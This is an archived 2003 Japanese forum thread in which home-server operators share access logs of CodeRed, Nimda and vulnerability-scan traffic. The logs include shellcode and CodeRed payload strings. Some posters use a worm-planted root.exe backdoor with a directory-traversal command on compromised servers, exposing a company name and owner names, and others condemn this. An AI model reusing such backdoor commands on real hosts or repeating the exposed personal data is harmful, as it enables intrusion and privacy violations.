%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000
%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\
xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0 x8d}-\
x90\x90\x90\x8b\xf7f\xb8H\x063 ...
<以下略、とても長い>

174 :DNS未登録さん:03/06/01 07:30 ID:???
>>173
それうちにも来た。
そのあとなんか意味不明な文字があってしかもログが改行されちゃう。
何なのそれ?

175 :DNS未登録さん:03/06/01 13:04 ID:???
>>174
http://pc2.2ch.net/test/read.cgi/mysv/1044200633/170

176 :DNS未登録さん:03/06/10 00:05 ID:???
久々にIRC繋いだら、こんなん帰ってきたのだが…
irc.nara.wide.ad.jp - - [09/Jun/2003:23:40:24 +0900] "CONNECT 192.244.23.4:6667 HTTP/1.0" 403 1272

ワームチェックかなんかでしょうか?

177 : :03/06/14 03:18 ID:???
http://yahoobb219055208068.bbtec.net/

バッチリ幹線してるようです。
[2ch@localhost 2ch]wget --spider http://yahoobb219055208068.bbtec.net/
1 HTTP/1.1 200 OK
2 Server: Microsoft-IIS/5.0
3 Date: Fri, 13 Jun 2003 18:18:56 GMT
4 Connection: keep-alive
5 Connection: Keep-Alive
6 Content-Length: 1230
7 Content-Type: text/html
8 Set-Cookie: ASPSESSIONIDQQQQGSUC=KOPNHKABOIBNMLOKLKJJABEE; path=/
9 Cache-control: private
200 OK

どうやって警告したらいいでしょうか。

178 : :03/06/14 03:21 ID:???
ftpとか開いてるし、アノニログインできるし(;´Д`)
厨房運営の鯖でしょうか。

Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
6699/tcp open napster

179 : :03/06/14 03:25 ID:???
いろいろ情報が見れて楽しいね、他にもっと見れる情報無いかな?

htp://yahoobb219055208068.bbtec.net/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

アプリケーション例外が発生しました:
アプリケーション: (pid=1020)
発生時間: 2003/05/01 @ 21:50:51.907
例外番号: c0000005 (アクセス違反)

*----> システム情報 <----*
コンピュータ名: VFGYARXITW27V4Y
ユーザー名: Administrator
プロセッサの数: 1
プロセッサの種類: x86 Family 6 Model 8 Stepping 6
Windows 2000 Version: 5.0
現在のビルド: 2195
Service Pack: None
現在のタイプ: Uniprocessor Free
登録されている会社名: 日本フレートライナー(株)
登録されている所有者: 山ア勝行


180 :DNS未登録さん:03/06/14 05:53 ID:???
>>179
通報しますた。

181 :DNS未登録さん:03/06/14 07:32 ID:CsSAkb5z
キタ━━━━━(゚∀゚)━━━━━!!!!
http://homepage3.nifty.com/coco-nut/

182 :DNS未登録さん:03/06/14 10:32 ID:O9Qyx1v0
これはもう警鐘モンだぞ。
パッチも当てない危機感のないバカは鯖なんぞ立てるな。迷惑だ。

212.165.132.144 - - [14/Jun/2003:07:43:54 +0900] "GET /default.ida?XXXXXXXXX(rya

http://212.165.132.144/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

Application exception occurred:
App: (pid=1568)
When: 6/2/2003 @ 02:07:38.527
Exception number: c0000005 (access violation)

*----> System Information <----*
Computer Name: CISCO-ACS
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 8 Stepping 10
Windows 2000 Version: 5.0
Current Build: 2195
Service Pack: None
Current Type: Uniprocessor Free
Registered Organization: prestel
Registered Owner: okada

okadaって日本人か?

183 :DNS未登録さん:03/06/14 12:11 ID:???
(´-`).。oO(不正にアクセスして個人情報開示してるバカだよなぁ・・・)

184 :DNS未登録さん:03/06/14 12:25 ID:???
日本の法律では認証を掛けてないところにアクセスしても罪にならなかったような

185 :DNS未登録さん:03/06/14 12:29 ID:???
ややグレーゾーンに近いがな。
インデックスリストが丸見えになってて、顧客情報が見られたのを不正アクセスされたと逝ってるのと同じようなもんでしょ。

186 :DNS未登録さん:03/06/14 22:35 ID:???
わたしのホームページへアクセスした人は、不正アクセスでタイーホしてもらいます(w

187 :DNS未登録さん:03/06/16 06:20 ID:???
Code Green のベータ版バイナリを手に入れたので中をのぞいてみたのだが、
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
は Code Green の物らしい。
ウイルスだった事には変わりは無いわけだが。

188 :187:03/06/16 06:22 ID:???
あ、その下の物の方が重要っぽい。失礼

189 :DNS未登録さん:03/06/17 18:35 ID:???
かぎの開いている家に侵入して情報ファイルを持ち出したら
そいつは窃盗罪だろう。

不正アクセス防止法にはひっかからんかもしらんけど、盗んだ情報を
公開したりしてなにか損害が起きればけっこう痛いことになるかもね


190 :DNS未登録さん:03/06/25 00:41 ID:???
保守age

191 :DNS未登録さん:03/06/25 18:58 ID:wfI9oVW0
超過激ライブチャット登場!!!!!

あなたの命令で若い娘たちがヌレヌレモードへ

☆★アメリカ西海岸発☆★モザイクなし☆★

あなたの言葉で・・・ヌードにさせてください
あなたの指で・・・感じさせてください
あなたの声で・・・イ・カ・セ・テ・ください
寂しがりやの留学生の若い娘がお待ちしております!

ただいま、10分間無料で体験できるほか7日間会費無料!!

http://www.gals-cafe.com

192 :DNS未登録さん:03/06/27 23:41 ID:???
>>190
喪前がageるから・・・

193 :DNS未登録さん:03/07/03 03:00 ID:???
6月分のcodered。
01/Jun/2003 30
02/Jun/2003 37
03/Jun/2003 24
04/Jun/2003 31
05/Jun/2003 30
06/Jun/2003 24
07/Jun/2003 24
08/Jun/2003 27
09/Jun/2003 31
10/Jun/2003 38
11/Jun/2003 30
12/Jun/2003 37
13/Jun/2003 40
14/Jun/2003 20
15/Jun/2003 25
16/Jun/2003 33
17/Jun/2003 27
18/Jun/2003 22
19/Jun/2003 21
20/Jun/2003 28
21/Jun/2003 24
22/Jun/2003 22
23/Jun/2003 27
24/Jun/2003 34
25/Jun/2003 26
26/Jun/2003 32
27/Jun/2003 33
28/Jun/2003 32
29/Jun/2003 24
30/Jun/2003 16

194 :DNS未登録さん:03/07/05 03:27 ID:???
これワーム関係?初めて見たんだけど
それともアタック?
2003/07/05,01:55:31,,"","-",GET,"/.pl","-","-",403,266,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.dll","-","-",404,277,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.exe","-","-",404,277,"-","-"
2003/07/05,01:55:40,,"","-",GET,"/_vti_inf.html","-","-",404,272,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/administrators.pwd","-","-",404,286,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/authors.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/service.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/users.pwd","-","-",404,277,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/abc/showcode.asp","-","-",404,275,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/carbo.dll","-","-",404,268,"-","-"
2003/07/05,01:55:44,,"","-",GET,"/cfdocs/expelval/displayopenedfile.cfm","-","-",404,296,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/exprcalc.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/openfile.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:46,,"","-",GET,"/cfdocs/expelval/sendmail.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/aglimpse","-","-",403,279,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/AnyForm2","-","-",403,279,"-","-"
2003/07/05,01:55:50,,"","-",GET,"/cgi-bin/AT-admin.cgi","-","-",403,283,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/bnbform.cgi","-","-",403,282,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/campas","-","-",403,277,"-","-"
2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"
全67行

195 :DNS未登録さん:03/07/05 04:45 ID:???
アクセスしようとしてるファイル名から推測すると
IIS狙いのワームでないかい?

うちにはまだお見えになられてないです

196 :DNS未登録さん:03/07/05 14:20 ID:???
>>194
> 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"

cgiwrapの設定不備狙ってる?
IIS狙いとは言い切れない予感。

例の改ざん祭りの下準備かも((((((;゚Д゚))))))ガクガクブルブル


197 :DNS未登録さん:03/07/05 17:11 ID:???
>196

祭りドコー?


198 :DNS未登録さん:03/07/06 03:35 ID:???
http://news2.2ch.net/test/read.cgi/newsplus/1057237070/

199 :山崎 渉:03/07/15 11:10 ID:???

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

200 :DNS未登録さん:03/07/26 11:29 ID:???
孫さん家の人が衛生管理していないので、「出禁」にしています。
衛生管理出来る様になったら、タイム系サーバーを追加して
監視兵を置くかな・・・

201 :DNS未登録さん:03/07/29 04:10 ID:???
そういえばどこかの検索エンジンのロボットはワームみたいな動きをしていくな。

202 :DNS未登録さん:03/07/29 14:30 ID:???
最近、損さん家のf@t息子が猛烈アタックしてきます。
UDPの3010・3012・3013と投げてくるけど、これ何でしょ?

203 :DNS未登録さん:03/07/29 17:23 ID:???
ロボットといえばnabotは迷惑だ

204 :ぼるじょあ ◆ySd1dMH5Gk :03/08/02 05:04 ID:???
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

205 :DNS未登録さん:03/08/05 10:38 ID:???
これって何かのウイルス?
今朝会社にきたら、↓と同じぺージに書き換えられてた。
http://217.127.31.195/index.htm

やられて放置してる鯖もイパーイなんですが・・・。↓
http://www.google.co.jp/search?q=Copyright+by+Seyeon+TECH+Co.%2C+Ltd.&ie=UTF-8&oe=UTF-8&hl=ja&lr=
なんやのこれ〜〜〜!

206 :DNS未登録さん:03/08/05 10:39 ID:FAyYsQpc
あげ

207 :DNS未登録さん:03/08/05 11:08 ID:???
>>205
なんで書き換えられちゃうわけ?あなたの会社のサイト
ろくにパッチも当ててないDQN鯖官なのけ

208 :205:03/08/05 11:11 ID:???
>>207
ごめん、動揺して説明たらずだった。

会社きて、自宅のHP見てみようとしたら、書き換えられてた。
自宅鯖はルータでHTTP、FTP,DNS,SSLのポートしか空けてねえです。

はぁ…

209 :DNS未登録さん:03/08/05 11:16 ID:???
>>208
なんか穴があるんだろうね
いい機会だから徹底的にしらべましょう

210 :DNS未登録さん:03/08/05 11:20 ID:???
この会社に恨みがある奴がやりまくったのかな

211 :205:03/08/05 11:21 ID:???
SSLとBINDがあやしいっすね。
最近会社忙しく自宅鯖放置気味だったからバチが当たったなー…

なんていうか、自宅に帰る7時半まで手を出せないのがもどかしい…

212 :DNS未登録さん:03/08/05 12:56 ID:???
atfr064007013.do.ppp.infoweb.ne.jp - - [04/Aug/2003:01:02:25 +0900] "GET /defaul
t.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u68
58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190
%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-"
yahoobb219214144203.bbtec.net - - [04/Aug/2003:12:12:29 +0900] "GET /default.ida
?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-"

この2ホスト、ここ1ヶ月ほど止まらない。
毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・
そろそろISPのabuseにでも連絡すっかな。

213 :DNS未登録さん:03/08/05 15:36 ID:???
>>212
> 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・

・・・。

214 :DNS未登録さん:03/08/05 20:59 ID:qWW0gjj4
ウィルス、ワーム対策としてモデムとサーバの間にルータを噛ませてさらにサーバ、
クライアントにはウィルス対策ソフトをインストールする程度ではまだ足りないでしょうか?
もちろんウィンドウのアップデート、パッチは最新のものをなるべく早く当てるようにします。

215 :DNS未登録さん:03/08/05 21:16 ID:???
>>214
根本的にだめ。
ウイルス、ワーム、セキュリティについてのポリシーを
自分で確立すべし

216 :DNS未登録さん:03/08/06 19:31 ID:???
俺の自宅サーバーにおけるセキュリティについての考え方のひとつに
「稼動時間を減らす」てのあるけど誰も賛同してくれん。
「馬鹿じゃねぇ?」「使えねぇ!」の連呼









うるせー馬鹿!

217 :DNS未登録さん:03/08/06 20:44 ID:???
>>216
いや、科学技術庁も導入したぐらいだし(藁

218 :DNS未登録さん:03/08/06 21:29 ID:???
稼働時間を減らしたところで、穴をあけっぱなしにしていれば頻繁にやってくるワームにやられるので
結局常時稼働とさほど変わらないんでないの?

セキュリティで最も重要なのは、穴をあけない、見つかったらすぐにふさぐという基本的な事項をしっかり行うこと。

219 :DNS未登録さん:03/08/09 14:49 ID:???
うちは、CodeRedが30〜40件/日、ほとんどが韓国と中国
それから、Nimdaも30〜40連続アタック
[error][client 61.213.32.47] 千葉のCATV局だ。もー頼むよ・・・。

220 :DNS未登録さん:03/08/09 15:00 ID:???
うちも先月までは>>219とほぼ同量のアタックがあったんだが、
1週間程度、接続元IPが韓国・中国・台湾のパケットを総蹴りにしたら
解除した後もなぜかアタックが以前より減少してる


221 :DNS未登録さん:03/08/09 20:59 ID:???
どれくらい来てるのかな?とオモテ2002年10月以降のログを一括検索したら4609件出てきた。
ヽ(`Д´)ノウワァァァン

222 :DNS未登録さん:03/08/11 04:02 ID:???
Nimdaの時に比べたらかなり平和だよな。
あのときはピーク時で1分間に2〜3回アクセスが続いたし。
帰省中だったので放置しているうちにログが肥大化して帰ってきたらfile system fullでかなり焦った。

223 :山崎 渉:03/08/15 22:39 ID:???
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

224 :DNS未登録さん:03/08/16 09:01 ID:???
今度は135の悪夢

73 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)